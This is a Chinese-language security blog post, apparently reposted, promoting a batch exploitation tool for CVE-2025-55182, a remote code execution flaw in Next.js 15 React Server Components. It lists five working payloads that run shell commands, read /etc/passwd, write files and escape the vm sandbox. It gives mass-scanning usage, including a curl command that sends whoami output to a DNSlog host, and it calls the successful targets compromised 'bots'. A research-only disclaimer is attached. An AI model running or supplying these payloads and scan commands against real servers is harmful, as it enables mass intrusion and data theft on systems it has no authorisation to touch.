文章总结: 本文介绍了CVE-2025-55182Next.js15ReactServerComponents原型污染导致RCE漏洞的检测与利用脚本。影响版本为15.0.0至15.0.4,修复版本为15.0.5及以上。文章提供了详细的Payload合集及批量验证工具使用方法,支持单目标和批量模式,能自动轮询Payload并保存结果,建议受影响用户尽快升级版本。
综合评分: 83
文章分类: 漏洞POC,漏洞分析,渗透测试,WEB安全,安全工具
cve_2025_55182批量漏洞的检测+利用脚本
原创
hzhsec
hzhsec
W小哥
2026年1月19日 11:33
浙江
CVE-2025-55182 Next.js 15 React Server Components 原型污染 RCE
终极批量验证工具使用说明 & 免责声明
一、漏洞概述
-
CVE 编号
:CVE-2025-55182
-
影响版本
:Next.js 15.0.0 ~ 15.0.4(含 canary 版)
-
漏洞类型
:React Server Components(RSC)中
$ACTION_0:0参数处理不当导致的原型链污染 → 任意代码执行(RCE) -
修复版本
:Next.js ≥ 15.0.5(已升级 react-server-dom-webpack/turbopack ≥ 19.2.0)
二、参考资料(强烈建议阅读)
-
漏洞详细分析文章(中文最全):
https://blog.csdn.net/qq_62275604/article/details/155561777http://www.hzhsec.top/list/cve漏洞复现/cve-2025-55182/
-
官方 PoC 与本地复现环境(可一键搭建测试靶机):
https://github.com/ejpir/CVE-2025-55182-poc/
三、已验证有效 Payload 合集(本工具内置全部)
{"id":"child_process#execSync","bound":["whoami"]} {"id":"fs#readFileSync","bound":["/etc/passwd"]} {"id":"fs#writeFileSync","bound":["/tmp/pwned.txt","CVE-2025-55182"]} {"id":"vm#runInThisContext","bound":["process.mainModule.require(\"child_process\").execSync(\"id\").toString()"]} {"id":"vm#runInNewContext","bound":["this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"whoami\").toString()"]}
四、工具功能亮点
- 支持单目标
-u和批量-f两种模式 - 内置上述全部 5 条最强 Payload,自动轮询哪个能打通用哪个
- 实时显示响应时间(精确到毫秒)
- 智能超时机制(默认 10 秒超时自动跳过,绝不卡死)
- 成功目标自动保存(含响应时间 + 使用的 Payload + 执行结果)
五、使用方法
# 1. 单目标快速测试python cve-2025-55182_fast.py -u http://target.com python cve-2025-55182_fast.py -u 1.2.3.4:3000 -c "id"# 2. 批量验证(推荐)python cve-2025-55182_fast.py -f urls.txt python cve-2025-55182_fast.py -f urls.txt -c "cat /etc/passwd"# 3. 常用命令示例-c "id"-c "whoami"-c "cat /flag"-c "cat /etc/passwd"-c "curl http://你的dnslog.cn/$(whoami)"
六、输出文件说明
扫描完成后结果保存在 CVE-2025-55182_RCE_Results/ 目录:
-
RCE_SUCCESS.txt→ 重点关注!每一行都是真实可 RCE 的肉鸡
-
rce_results.jsonl→ 完整扫描记录(含失败目标)
关注公众号回复“20251229”获取工具地址。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:W小哥 hzhsec
hzhsec《cve202555182批量漏洞的检测+利用脚本》